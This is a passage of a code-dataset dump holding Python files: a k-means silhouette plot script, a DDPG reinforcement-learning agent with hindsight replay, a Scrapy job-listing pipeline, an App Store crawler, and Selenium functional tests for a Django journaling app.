Quiz/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"20761502","text":"# code found at http://scikit-learn.org/stable/auto_examples/cluster/plot_kmeans_silhouette_analysis.html\n\nfrom __future__ import print_function\nfrom os.path import dirname, realpath\nimport sys\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_samples, silhouette_score\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\n\nfrom helpers.dim_reduction import get_data\nfrom helpers.constants import 
SVD_DIMS_R, SVD_DIMS_C\n\nprint(__doc__)\n\ndir_path = dirname(realpath(__file__))\noutput_dir = sys.argv[1] if len(sys.argv) >= 2 else 'BASE'\nOUTPUT = '{}/../OUTPUT'.format(dir_path)\nOUT = '{}/{}'.format(OUTPUT, output_dir)\n#BASE = '{}/../OUTPUT/BASE'.format(dir_path)\nBASE = OUT\n\nr_components = [8, 13, 21, 34, 55, 89, 104, 119, 134, 159]\nc_components = [8, 10, 14, 18, 25, 35, 45, 55, 65, 75]\nrange_n_clusters = c_components\n\ndef main(X, ds=\"\", xtra_title=\"\"):\n for n_clusters in range_n_clusters:\n # Create a subplot with 1 row and 2 columns\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.set_size_inches(18, 7)\n\n # The 1st subplot is the silhouette plot\n # The silhouette coefficient can range from -1, 1 but in this example all\n # lie within [-0.1, 1]\n ax1.set_xlim([-0.2, 1])\n # The (n_clusters+1)*10 is for inserting blank space between silhouette\n # plots of individual clusters, to demarcate them clearly.\n ax1.set_ylim([0, len(X) + (n_clusters + 1) * 10])\n\n # Initialize the clusterer with n_clusters value and a random generator\n # seed of 10 for reproducibility.\n clusterer = KMeans(n_clusters=n_clusters, random_state=10)\n cluster_labels = clusterer.fit_predict(X)\n\n # The silhouette_score gives the average value for all the samples.\n # This gives a perspective into the density and separation of the formed\n # clusters\n silhouette_avg = silhouette_score(X, cluster_labels)\n print(\"For n_clusters =\", n_clusters,\n \"The average silhouette_score is :\", silhouette_avg)\n\n # Compute the silhouette scores for each sample\n sample_silhouette_values = silhouette_samples(X, cluster_labels)\n\n y_lower = 10\n for i in range(n_clusters):\n # Aggregate the silhouette scores for samples belonging to\n # cluster i, and sort them\n ith_cluster_silhouette_values = \\\n sample_silhouette_values[cluster_labels == i]\n\n ith_cluster_silhouette_values.sort()\n\n size_cluster_i = ith_cluster_silhouette_values.shape[0]\n y_upper = y_lower + size_cluster_i\n\n color = cm.nipy_spectral(float(i) / n_clusters)\n ax1.fill_betweenx(np.arange(y_lower, y_upper),\n 0, ith_cluster_silhouette_values,\n facecolor=color, edgecolor=color, alpha=0.7)\n\n # Label the silhouette plots with their cluster numbers at the middle\n #ax1.text(-.35, y_lower + 0.5 * size_cluster_i, str(i))\n\n # Compute the new y_lower for next plot\n y_lower = y_upper + 10 # 10 for the 0 samples\n\n ax1.set_title(\"%s Silhouette plot (%d clusters)%s\" % (ds, n_clusters, xtra_title))\n ax1.set_xlabel(\"The silhouette coefficient values\")\n ax1.set_ylabel(\"Cluster label\")\n\n # The vertical line for average silhouette score of all the values\n ax1.axvline(x=silhouette_avg, color=\"red\", linestyle=\"--\")\n\n ax1.set_yticks([]) # Clear the yaxis labels / ticks\n ax1.set_xticks([-0.4, -0.2, 0, 0.2, 0.4, 0.6, 0.8, 1])\n\n # 2nd Plot showing the actual clusters formed\n colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)\n ax2.scatter(X[:, 0], X[:, 1], marker='.', s=30, lw=0, alpha=0.7,\n c=colors, edgecolor='k')\n\n # Labeling the clusters\n centers = clusterer.cluster_centers_\n # Draw white circles at cluster centers\n ax2.scatter(centers[:, 0], centers[:, 1], marker='o',\n c=\"white\", alpha=1, s=200, edgecolor='k')\n\n for i, c in enumerate(centers):\n ax2.scatter(c[0], c[1], marker='$%d$' % i, alpha=1,\n s=50, edgecolor='k')\n\n ax2.set_title(\"The visualization of the clustered data.\")\n ax2.set_xlabel(\"Feature space for the 1st feature\")\n ax2.set_ylabel(\"Feature space for the 2nd 
feature\")\n\n plt.suptitle((\"Silhouette analysis for KMeans clustering on sample data \"\n \"with n_clusters = %d\" % n_clusters),\n fontsize=14, fontweight='bold')\n\n plt.show()\n\ndef ICA():\n global range_n_clusters\n range_n_clusters = [i for i in range(5, 62, 8)]\n _r, _c = get_data('{}/ICA'.format(OUTPUT), '37-')\n c_X, _ = _c\n main(c_X)\n _r, _c = get_data('{}/ICA'.format(OUTPUT), '45-')\n r_X, _ = _r\n main(r_X)\n\ndef RP():\n global range_n_clusters\n range_n_clusters = [16, 30, 45]\n def runitc(p):\n _r, _c = get_data('{}/RP'.format(OUTPUT), '%s-' % p)\n c_X, _ = _c\n print('Cancer at %s dimensions' % p)\n main(c_X, 'Cancer', ' (%s dims)' % p)\n for i in ['16', '23', '30', '37', '44']:\n runitc(i)\n def runitr(p):\n _r, _c = get_data('{}/RP'.format(OUTPUT), '%s-' % p)\n r_X, _ = _r\n print('Reviews at %s dimensions' % p)\n main(r_X, 'Reviews', ' (%s dims)' % p)\n for i in ['44', '51', '65', '72', '79']:\n runitr(i)\n\ndef PCA():\n def runit(p):\n _r, _c = get_data('{}/PCA'.format(OUTPUT), '%s-' % p)\n r_X, _ = _r\n c_X, _ = _c\n main(r_X)\n main(c_X)\n for i in ['0.6']: #, '0.7', '0.8', '0.9']]\n runit(i)\n\ndef SVD():\n global range_n_clusters\n range_n_clusters = [18, 19, 20, 21, 22]#[16, 30, 45]\n def runitc(p):\n c_X, _ = get_data('{}/SVD'.format(OUTPUT), '%s-' % p, 'c')\n print('Cancer at %s dimensions' % p)\n main(c_X, 'Cancer', ' (%s dims)' % p)\n for i in SVD_DIMS_C:\n runitc(i)\n def runitr(p):\n r_X, _ = get_data('{}/SVD'.format(OUTPUT), '%d-' % p, 'r')\n print('Reviews at %s dimensions' % p)\n main(r_X, 'Reviews', ' (%s dims)' % p)\n for i in SVD_DIMS_R:\n runitr(i)\n\nif __name__ == '__main__':\n if sys.argv[1] == 'ICA':\n ICA()\n if sys.argv[1] == 'RP':\n RP()\n elif sys.argv[1] == 'PCA':\n PCA()\n elif sys.argv[1] == 'SVD':\n SVD()\n","sub_path":"src/silhouette.py","file_name":"silhouette.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82777469","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# import libraries\nimport time\nimport random\nimport argparse\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nimport gym\n\n# create replay buffer\nclass Episode_experience():\n def __init__(self):\n # initialize buffer\n self.memory = []\n \n def add(self, state, action, reward, next_state, done, goal):\n # add tuple of experience to buffer\n self.memory += [(state, action, reward, next_state, done, goal)]\n \n def clear(self):\n # clear the buffer\n self.memory = []\n \nclass DDPGAgent:\n def __init__(self, action_low=-1, action_high=1, gamma=0.98, actor_learning_rate=0.001, \n critic_learning_rate=0.001, tau=1e-3):\n \n # initialize limits for action clipping\n self.action_low = action_low\n self.action_high = action_high\n \n # setup variables for RL\n self.tau = tau \n self.gamma = gamma \n self.batch_size = 64\n self.gradient_norm_clip = None\n self.a_learning_rate = actor_learning_rate\n self.c_learning_rate = critic_learning_rate \n \n # initialize experience buffer\n self.memory = []\n self.buffer_size = int(5e5)\n \n # create a neural network\n self._construct_nets()\n \n def _construct_nets(self):\n # initialize computation graph\n #tf.reset_default_graph()\n self.sess = tf.Session()\n \n # initialize palce holders for computation\n self.R = tf.placeholder(tf.float32, [None, ], 'r')\n self.D = tf.placeholder(tf.float32, [None, ], 'done')\n self.G = tf.placeholder(tf.float32, [None, 3], 'goal')\n self.S = 
tf.placeholder(tf.float32, [None, 25], 'state')\n self.S_ = tf.placeholder(tf.float32, [None, 25], 'next_state')\n \n # create actor and critic networks along with target networks\n with tf.variable_scope('Actor'):\n self.a = self._build_a(self.S, self.G, scope='eval')\n self.a_ = self._build_a(self.S_, self.G, scope='target')\n with tf.variable_scope('Critic'):\n self.q = self._build_c(self.S, self.a, self.G, scope='eval')\n self.q_ = self._build_c(self.S_, self.a_, self.G, scope='target')\n \n # get list of parameters for each network\n self.ae_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,\n scope='Actor/eval')\n self.at_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, \n scope='Actor/target')\n self.ce_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, \n scope='Critic/eval')\n self.ct_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, \n scope='Critic/target')\n\n # soft update operation of target networks\n self.soft_update_op = [[tf.assign(ta, (1 - self.tau) * ta + self.tau * ea), \n tf.assign(tc, (1 - self.tau) * tc + self.tau * ec)]\n for ta, ea, tc, ec in zip(self.at_params, self.ae_params, self.ct_params, self.ce_params)]\n\n # operation to compute target q value\n q_target = self.R + self.gamma * (1-self.D) * self.q_\n \n # loss function for actor and critic networks\n self.c_loss = tf.losses.mean_squared_error(q_target, self.q)\n self.a_loss = - tf.reduce_mean(self.q)\n \n # perform optimization based on gradient clipping\n if self.gradient_norm_clip is not None:\n # initialize critic optimizer\n c_optimizer = tf.train.AdamOptimizer(self.c_learning_rate)\n c_gradients = c_optimizer.compute_gradients(self.c_loss, \n var_list=self.ce_params)\n \n # perform gradient clipping\n for i, (grad, var) in enumerate(c_gradients):\n if grad is not None:\n c_gradients[i] = (tf.clip_by_norm(grad, self.gradient_norm_clip), var)\n self.c_train = c_optimizer.apply_gradients(c_gradients)\n \n # initialize actor optimizer\n a_optimizer = tf.train.AdamOptimizer(self.a_learning_rate)\n a_gradients = c_optimizer.compute_gradients(self.a_loss, \n var_list=self.ae_params)\n \n # perform gradient clipping\n for i, (grad, var) in enumerate(a_gradients):\n if grad is not None:\n a_gradients[i] = (tf.clip_by_norm(grad, self.gradient_norm_clip), var)\n self.a_train = a_optimizer.apply_gradients(a_gradients)\n else:\n # perform optimization without gradient clipping\n self.c_train = tf.train.AdamOptimizer(self.c_learning_rate).minimize(self.c_loss, var_list=self.ce_params)\n self.a_train = tf.train.AdamOptimizer(self.a_learning_rate).minimize(self.a_loss, var_list=self.ae_params)\n \n # initialize model saver\n self.saver = tf.train.Saver() \n \n # variable initializer for session\n self.sess.run(tf.global_variables_initializer())\n \n def _build_a(self, s, g, scope): \n # actor network based on UVFA (Schaul et al. 2015)\n with tf.variable_scope(scope):\n # use both state and goal as input for network\n net = tf.concat([s, g], 1) ################################\n net = tf.layers.dense(net, 256, tf.nn.relu)\n net = tf.layers.dense(net, 256, tf.nn.relu)\n net = tf.layers.dense(net, 256, tf.nn.relu)\n a = tf.layers.dense(net, 4, tf.nn.tanh)\n return a * (self.action_high-self.action_low)/2 + (self.action_high+self.action_low)/2\n \n def _build_c(self, s, a, g, scope): \n # critic network based on UVFA (Schaul et al. 
2015)\n with tf.variable_scope(scope):\n net = tf.concat([s, a, g], 1) ################################\n net = tf.layers.dense(net, 256, tf.nn.relu)\n net = tf.layers.dense(net, 256, tf.nn.relu)\n net = tf.layers.dense(net, 256, tf.nn.relu)\n return tf.layers.dense(net, 1)\n \n # execute noisy version of policy output\n def choose_action(self, state, goal, variance): \n action = self.sess.run(self.a, {self.S: state, self.G: goal})[0]\n return np.clip(np.random.normal(action, variance), self.action_low, self.action_high)\n \n # append episode experience to replay buffer\n def remember(self, ep_experience):\n self.memory += ep_experience.memory\n if len(self.memory) > self.buffer_size:\n self.memory = self.memory[-self.buffer_size:] # empty the first memories\n \n # network update step from experience replay\n def replay(self, optimization_steps=1):\n # if there's no enough transitions, do nothing\n if len(self.memory) < self.batch_size: \n return 0, 0\n\n # perform optimization for optimization_steps\n a_losses = 0\n c_losses = 0\n for _ in range(optimization_steps):\n # get a minibatch\n minibatch = np.vstack(random.sample(self.memory, self.batch_size))\n\n # stack states, actions and rewards\n ss = np.vstack(minibatch[:,0])\n acs = np.vstack(minibatch[:,1])\n rs = minibatch[:,2]\n nss = np.vstack(minibatch[:,3])\n ds = minibatch[:,4]\n gs = np.vstack(minibatch[:,5]) ################################\n \n # obtain the losses and perform one gradient update step\n a_loss, c_loss, _, _ = self.sess.run([self.a_loss, self.c_loss, self.a_train, self.c_train],\n {self.S: ss, self.a: acs, self.R: rs,\n self.S_: nss, self.D: ds, self.G: gs})\n \n # accumulate losses over steps\n a_losses += a_loss\n c_losses += c_loss\n \n return a_losses/optimization_steps, c_losses/optimization_steps\n \n # utility function to update target network\n def update_target_net(self):\n self.sess.run(self.soft_update_op)\n'''\n# environment to evaluate ddpg\nclass ChaseEnv():\n def __init__(self):\n\n # threshold for detecting success\n self.thr = 1 \n \n def reset(self):\n # reset goal and state at end of episode\n self.goal = self.size * (2*np.random.random(2)-1) \n self.state = self.size * (2*np.random.random(2)-1)\n return np.copy(self.state/self.size), np.copy(self.goal/self.size)\n\n def reward_func(self, state, goal):\n # define two types of states\n good_done = np.linalg.norm(state-goal) <= self.thr\n bad_done = np.max(np.abs(state)) > self.size\n \n if self.reward_type == 'sparse':\n # output binary reward for sparse\n reward = 0 if good_done else -1\n else:\n # output dense reward for other cases\n reward = 5*self.size if good_done else -10 if bad_done else -np.linalg.norm(state-goal)/200\n \n # return done flag as well\n return good_done or bad_done, reward\n\n def step(self, action, scale=4):\n # step through the env\n self.state += action/scale\n \n # obtain reward and done flag\n done, reward = self.reward_func(self.state, self.goal)\n \n # return update\n return np.copy(self.state/self.size), reward, done\n \n def render(self):\n # render state of env\n print(\"\\rstate :\", np.array_str(self.state), \n \"goal :\", np.array_str(self.goal), end=' '*10)\n \n'''\n \ndef main():\n\n reward_type='sparse'\n env=gym.make('FetchPickAndPlace-v1')\n\n # initialize DDPG agent\n agent = DDPGAgent(actor_learning_rate=0.0001, \n critic_learning_rate=0.0001, tau=0.1)\n variance = 5\n \n # use hindsight experience replay or not\n use_her = True\n \n # variables for network training\n num_epochs = 400\n num_episodes = 
40\n optimization_steps = 40\n episode_length = 50\n \n # implement K-future strategy for HER\n K = 4\n '''\n the ratio between HER replays and regular replays (e.g. K = 4 -> 4 times\n as many HER replays as regular replays are used)\n \n '''\n\n # initialize buffers for tracking progress\n a_losses = []\n c_losses = []\n ep_mean_r = []\n success_rate = []\n\n # initialize buffers for episode experience\n ep_experience = Episode_experience()\n ep_experience_her = Episode_experience()\n\n # flags for training\n train = True\n\n if train:\n # time the performance of network\n total_step = 0\n start = time.clock()\n\n # loop for num_epochs\n for i in range(num_epochs):\n\n # tracking successes per epoch\n successes = 0\n ep_total_r = 0\n\n # loop over episodes\n for n in range(num_episodes):\n # reset env\n a=env.reset()\n state, goal = a['observation'], a['desired_goal']\n done=False\n\n # run env for episode_length steps\n while not done:\n # track number of samples\n total_step += 1\n\n # obtain action by agent\n state=state.reshape(1,25)\n goal=goal.reshape(1,3)\n action = agent.choose_action(state, goal, variance) ########@$%@%$#@$#@%@\n\n # execute action in env\n obs, reward, done, info = env.step(action)\n next_state=obs['observation'].reshape(1,25)\n \n # track reward and add regular experience\n ep_total_r += reward\n ep_experience.add(state, action, reward, next_state, done, goal)\n state = next_state\n\n # add experience using her\n if total_step % 100 == 0 or done:\n if use_her: \n # add additional experience for each time step\n for t in range(len(ep_experience.memory)):\n # get K future states per time step\n ################\n # Can we improve the K-future strategy?\n ################\n for _ in range(K):\n # get random future t\n future = np.random.randint(t, len(ep_experience.memory))\n\n # get new goal at t_future\n goal_ = ep_experience.memory[future][3][0,3:6] ##########################\n state_ = ep_experience.memory[t][0]\n action_ = ep_experience.memory[t][1]\n next_state_ = ep_experience.memory[t][3]\n done_, reward_ = True, 0\n\n # add new experience to her\n ep_experience_her.add(state_, action_, reward_, \n next_state_, done_, goal_)\n\n # add this her experience to agent buffer\n agent.remember(ep_experience_her)\n ep_experience_her.clear()\n\n # add regular experience to agent buffer\n agent.remember(ep_experience)\n ep_experience.clear()\n\n # perform optimization step\n variance *= 0.9995\n a_loss, c_loss = agent.replay(optimization_steps)\n a_losses += [a_loss]\n c_losses += [c_loss]\n agent.update_target_net()\n\n # if episode ends start new episode\n if done:\n break\n\n # keep track of successes\n successes += reward==0 and done\n\n # obtain success rate per epoch\n success_rate.append(successes/num_episodes)\n ep_mean_r.append(ep_total_r/num_episodes)\n\n # print statistics per epoch\n print(\"\\repoch\", i+1, \"success rate\", success_rate[-1], \n \"ep_mean_r %.2f\"%ep_mean_r[-1], 'exploration %.2f'%variance, end=' '*10)\n\n # output total training time\n print(\"Training time : %.2f\"%(time.clock()-start), \"s\")\n \n # plot the performance stats\n plt.figure()\n plt.plot(success_rate)\n plt.title('Success Rates')\n plt.show()\n \n plt.figure()\n plt.plot(a_losses)\n plt.title('Actor Losses')\n plt.show()\n \n plt.figure()\n plt.plot(ep_mean_r)\n plt.title('Mean Episode Rewards')\n plt.show()\n \n # perform test inference\n agent.saver.save(agent.sess, 'checkpoints/fetchpickandplace.ckpt')\n # load saved model\n agent.saver.restore(agent.sess, 
'checkpoints/fetchpickandplace.ckpt')\n\n    # evaluate network for 5 episodes\n    for _ in range(5):\n        r = 0\n        z=env.reset()\n        state, goal = z['observation'],z['desired_goal'] \n        \n        # run through the episode\n        for _ in range(50):\n            env.render()\n\n            state=state.reshape(1,25)\n            goal=goal.reshape(1,3)\n            action = agent.choose_action(state, goal, 0)\n            obs, reward, done, _ = env.step(action)\n            r += reward\n            next_state=obs['observation']\n            state = next_state\n            time.sleep(0.04)\n\n            # render the final result\n            if done:\n                env.render()\n                break\n        print(\"reward : %06.2f\"%r, \" success :\", reward==0)\n\n\nif __name__=='__main__':\n    main()\n","sub_path":"lowLevelTf_ddpg_her.py","file_name":"lowLevelTf_ddpg_her.py","file_ext":"py","file_size_in_byte":16356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"229251256","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport hashlib\nimport scrapy\nimport sqlite3\nfrom scrapy.exceptions import DropItem\n\n\nclass JobPipeline(object):\n    def __init__(self):\n        # Initialize the SQLite database\n        self.connection = sqlite3.connect('./sqlite.db')\n        self.cursor = self.connection.cursor()\n        self.cursor.execute('CREATE TABLE IF NOT EXISTS qcwy ' \\\n            '(id INTEGER PRIMARY KEY,' \\\n            'url VARCHAR,' \\\n            'company_name VARCHAR,'\n            'job_position VARCHAR,'\n            'city VARCHAR,'\n            'salary VARCHAR,'\n            'company_type VARCHAR,'\n            'company_size VARCHAR,'\n            'company_area VARCHAR,'\n            'experience_requirement VARCHAR,'\n            'education_requirement VARCHAR,'\n            'recruiting_number VARCHAR,'\n            'posted_date VARCHAR,'\n            'job_tag VARCHAR,'\n            'job_info TEXT,'\n            'company_info TEXT'\n            ')')\n        self.cursor.execute('CREATE TABLE IF NOT EXISTS lagou ' \\\n            '(id INTEGER PRIMARY KEY,' \\\n            'url VARCHAR,' \\\n            'company_name VARCHAR'\n            ')')\n        self.count = 0\n\n    def process_item(self, item, spider):\n        if spider.name == 'qcwy':\n            self.cursor.execute(\"select * from qcwy where url=?\", (item['url'],))\n            result = self.cursor.fetchone()\n            if result:\n                raise DropItem(\"Duplicate item found: %s\" % item)\n            else:\n                self.cursor.execute(\n                    \"\"\"INSERT INTO qcwy \n                    (url, job_position, company_name, city, salary, company_type,\n                    company_size, company_area, experience_requirement,\n                    education_requirement, recruiting_number, posted_date,\n                    job_tag, job_info, company_info) \n                    VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?);\"\"\", \n                    (item['url'], \n                    item['job_position'],\n                    item['company_name'],\n                    item['city'],\n                    item['salary'],\n                    item['company_type'],\n                    item['company_size'],\n                    item['company_area'],\n                    item['experience_requirement'],\n                    item['education_requirement'],\n                    item['recruiting_number'],\n                    item['posted_date'],\n                    item['job_tag'],\n                    item['job_info'],\n                    item['company_info'],))\n                self.connection.commit()\n        elif spider.name == 'lagou':\n            self.cursor.execute(\"select * from lagou where url=?\", (item['url'],))\n            result = self.cursor.fetchone()\n            if result:\n                raise DropItem(\"Duplicate item found: %s\" % item)\n            else:\n                self.cursor.execute(\n                    \"\"\"INSERT INTO lagou \n                    (url, company_name) \n                    VALUES (?,?);\"\"\", \n                    (item['url'], \n                    item['company_name']))\n                self.connection.commit()\n        self.count += 1\n        print('%d job info pages parsed' % self.count)\n        return item\n","sub_path":"THUDataPiCrawler_51job/job/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"65846156","text":"from lxml import html\r\nimport requests\r\nimport time\r\n\r\nclass AppCrawler:\r\n\r\n\tdef __init__(self, url_inicial, nivel_max):\r\n\t\tself.url_inicial = url_inicial\r\n\t\tself.nivel_max = nivel_max\r\n\t\tself.nivel_atual = 0\r\n\t\tself.links_nivel = []\r\n\t\tself.apps = []\r\n\r\n\tdef get_app_do_link(self, link):\r\n\t\tpagina_inicial = requests.get(link)\r\n\t\tarvore = html.fromstring(pagina_inicial.text)\r\n\r\n\t\tnome = arvore.xpath('//h1[@class=\"product-header__title app-header__title\"]/text()')[0].strip()\r\n\t\tdesenvolvedor = arvore.xpath('//dd[@class=\"information-list__item__definition l-column medium-9 large-6\"]/text()')[0].strip()\r\n\t\tlinks = arvore.xpath('//a[@class=\"we-lockup targeted-link l-column small-2 medium-3 large-2 ember-view\"]/@href')\r\n\r\n\t\tapp = App(nome, desenvolvedor, links)\r\n\t\t\r\n\t\treturn app\r\n\r\n\tdef crawl(self):\r\n\r\n\t\tapp = self.get_app_do_link(self.url_inicial)\r\n\t\tself.apps.append(app)\r\n\t\tself.links_nivel.append(app.links)\r\n\r\n\t\twhile self.nivel_atual < self.nivel_max:\r\n\t\t\tlinks_atuais = []\r\n\t\t\tfor link in self.links_nivel[self.nivel_atual]:\r\n\t\t\t\tapp_atual = self.get_app_do_link(link)\r\n\t\t\t\tlinks_atuais.extend(app_atual.links)\r\n\t\t\t\tself.apps.append(app_atual)\r\n\t\t\t\ttime.sleep(2)\r\n\t\t\tself.nivel_atual += 1\r\n\t\t\tself.links_nivel.append(links_atuais)\r\n\t\t\r\n\t\treturn\r\n\r\n\r\nclass App:\r\n\tdef __init__(self, nome, desenvolvedor, links):\r\n\t\tself.nome = nome\r\n\t\tself.desenvolvedor = desenvolvedor\r\n\t\tself.links = links\r\n\r\n\tdef __str__(self):\r\n\t\treturn (\"'\" + self.nome + \"'; '\" + self.desenvolvedor + \"'\")\r\n\r\ncrawler = AppCrawler('https://itunes.apple.com/br/app/clash-royale/id1053012308', 1)\r\ncrawler.crawl()\r\nfor app in crawler.apps:\r\n\tprint(app)\r\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"154258161","text":"from datetime import date\nimport time\nimport sys\n\nfrom django.conf import settings\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom .index_page import IndexPage\nfrom .server_tools import create_session_on_server, reset_database\nfrom .management.commands.create_session import create_pre_authenticated_session\n\nDEFAULT_WAIT = 5\n\nTEST_EMAIL = 'alice@mockmyid.com'\n\nclass FunctionalTest(StaticLiveServerTestCase):\n\n @classmethod\n def setUpClass(cls):\n for arg in sys.argv:\n if 'liveserver' in arg:\n cls.server_host = arg.split('=')[1]\n cls.server_url = 'http://' + cls.server_host\n cls.against_staging = True\n return\n super().setUpClass()\n cls.against_staging = False\n cls.server_url = cls.live_server_url\n\n @classmethod\n def tearDownClass(cls):\n if not cls.against_staging:\n super().tearDownClass()\n\n def setUp(self):\n if self.against_staging:\n reset_database(self.server_host)\n self.browser = webdriver.Firefox()\n self.browser.implicitly_wait(DEFAULT_WAIT)\n\n def tearDown(self):\n self.browser.refresh()\n self.browser.quit()\n super().tearDown()\n\n def wait_for(self, function_with_assertion, timeout=DEFAULT_WAIT):\n start_time = time.time()\n while time.time() - start_time < timeout:\n try:\n return function_with_assertion()\n except 
(AssertionError, WebDriverException):\n time.sleep(0.1)\n # one more try, which will raise any errors if they are outstanding\n return function_with_assertion()\n\n def wait_for_element_with_id(self, element_id):\n WebDriverWait(self.browser, timeout=30).until(\n lambda b: b.find_element_by_id(element_id),\n 'Could not find element with id {}. Page text was:\\n{}'.format(\n element_id, self.browser.find_element_by_tag_name('body').text\n )\n )\n\n def switch_to_new_window(self, text_in_title):\n retries = 60\n while retries > 0:\n for handle in self.browser.window_handles:\n self.browser.switch_to_window(handle)\n if text_in_title in self.browser.title:\n return\n retries -= 1\n time.sleep(0.5)\n self.fail('could not find window')\n\n def wait_to_be_logged_in(self, email):\n self.wait_for_element_with_id('id_logout')\n navbar = self.browser.find_element_by_css_selector('.navbar')\n self.assertIn(email, navbar.text)\n\n def wait_to_be_logged_out(self, email):\n self.wait_for_element_with_id('id_login')\n navbar = self.browser.find_element_by_css_selector('.navbar')\n self.assertNotIn(email, navbar.text)\n\n def create_pre_authenticated_session(self, email):\n if self.against_staging:\n session_key = create_session_on_server(self.server_host, email)\n else:\n session_key = create_pre_authenticated_session(email)\n ## to set a cookie we need to first visit the domain.\n ## 404 pages load the quickest!\n self.browser.get(self.server_url + \"/404_no_such_url/\")\n self.browser.add_cookie(dict(\n name=settings.SESSION_COOKIE_NAME,\n value=session_key,\n path='/',\n ))\n\n def test_can_add_monthly_tasks_to_month_log(self):\n self.create_pre_authenticated_session(TEST_EMAIL)\n\n # Alice has heard of a new journaling app. She goes to check\n # out its homepage\n index_page = IndexPage(self).go_to_index_page()\n\n # She sees the name of the application in the title and the\n # header tells her she's on the index of the journal\n self.assertIn('Bullet Journal', self.browser.title)\n header_text = index_page.get_page_title()\n self.assertIn('Index', header_text)\n\n # She sees her index already has a link for this month\n today = date.today()\n month_page = index_page.go_to_month_page(today.year, today.month)\n\n # She sees an input box inviting her to add an item to the monthly\n # tasks list\n input_box = month_page.get_entry_input_box()\n self.assertEqual(\n input_box.get_attribute('placeholder'),\n 'Add an Entry!'\n )\n\n # She adds an item to the monthly task list and sees the list\n # update\n month_page.add_task('Buy groceries')\n month_page.wait_for_new_entry('Buy groceries')\n\n # She adds another task, and sees both tasks displayed\n month_page.add_task('Get car washed')\n month_page.wait_for_new_entry('Buy groceries')\n month_page.wait_for_new_entry('Get car washed')\n\n # Satisfied, she leaves the site\n\n def test_can_add_tasks_to_daily_log(self):\n self.create_pre_authenticated_session(TEST_EMAIL)\n\n # Alice returns to the journaling site and notices a new link\n # directing her to today's log\n index_page = IndexPage(self).go_to_index_page()\n day_page = index_page.go_to_today()\n\n # Here she finds an input box inviting her to add daily tasks\n input_box = day_page.get_entry_input_box()\n self.assertEqual(\n input_box.get_attribute('placeholder'),\n 'Add an Entry!'\n )\n\n # She adds an item to the daily task list and sees the list\n # update\n day_page.add_task('Reticulate splines')\n day_page.wait_for_new_entry('Reticulate splines')\n\n # She adds another task, and sees both tasks 
displayed\n day_page.add_task('Click cows')\n day_page.wait_for_new_entry('Reticulate splines')\n day_page.wait_for_new_entry('Click cows')\n\n # She sees a link back to the month page\n month_page = IndexPage(self).go_to_this_month()\n\n # On the month view she sees a link to her newly created daily\n # page and sees the tasks she added earlier\n day_page = month_page.go_to_day(date.today().day)\n day_page.wait_for_new_entry('Reticulate splines')\n day_page.wait_for_new_entry('Click cows')\n\n # Satisfied, she leaves the site\n\n def test_can_login(self):\n # Alice returns to the journaling website and sees a login\n # button for the first time\n index_page = IndexPage(self).go_to_index_page()\n self.browser.find_element_by_id('id_login').click()\n\n # A Persona login box appears\n self.switch_to_new_window('Mozilla Persona')\n\n # Alice logs in with her email address\n ## Use mockmyid.com for test email\n self.browser.find_element_by_id(\n 'authentication_email'\n ).send_keys(TEST_EMAIL)\n self.browser.find_element_by_tag_name('button').click()\n\n # The Persona window closes\n self.switch_to_new_window('Bullet Journal')\n\n # She can see that she is logged in\n self.wait_to_be_logged_in(email=TEST_EMAIL)\n\n # Refreshing the page, she sees it's a real session login,\n # not just a one-off for that page\n self.browser.refresh()\n self.wait_to_be_logged_in(email=TEST_EMAIL)\n\n # She clicks \"logout\" to logout\n self.browser.find_element_by_id('id_logout').click()\n self.wait_to_be_logged_out(email=TEST_EMAIL)\n\n # The \"logged out\" status also persists after a refresh\n self.browser.refresh()\n self.wait_to_be_logged_out(email=TEST_EMAIL)\n\n def test_save_multiple_entry_types(self):\n self.create_pre_authenticated_session(TEST_EMAIL)\n\n # Alice returns to the journaling site and notices new buttons\n # when she tries to add entries to the today page\n index_page = IndexPage(self).go_to_index_page()\n day_page = index_page.go_to_today()\n day_page.get_submit_button_group()\n\n # She submits a task, an event, and a note\n day_page.add_task(\"A Task\")\n day_page.add_event(\"An event\")\n day_page.add_note(\"A note\")\n\n # She sees each of her new entries with different bullets\n # representing the different type of entries\n day_page.wait_for_new_task(\"A Task\")\n day_page.wait_for_new_event(\"An event\")\n day_page.wait_for_new_note(\"A note\")\n\n # She tries the same on this month's page\n index_page = IndexPage(self).go_to_index_page()\n month_page = index_page.go_to_this_month()\n\n month_page.add_task(\"A Task\")\n month_page.add_event(\"An event\")\n month_page.add_note(\"A note\")\n\n month_page.wait_for_new_task(\"A Task\")\n month_page.wait_for_new_event(\"An event\")\n month_page.wait_for_new_note(\"A note\")\n\n # Satisfied, she 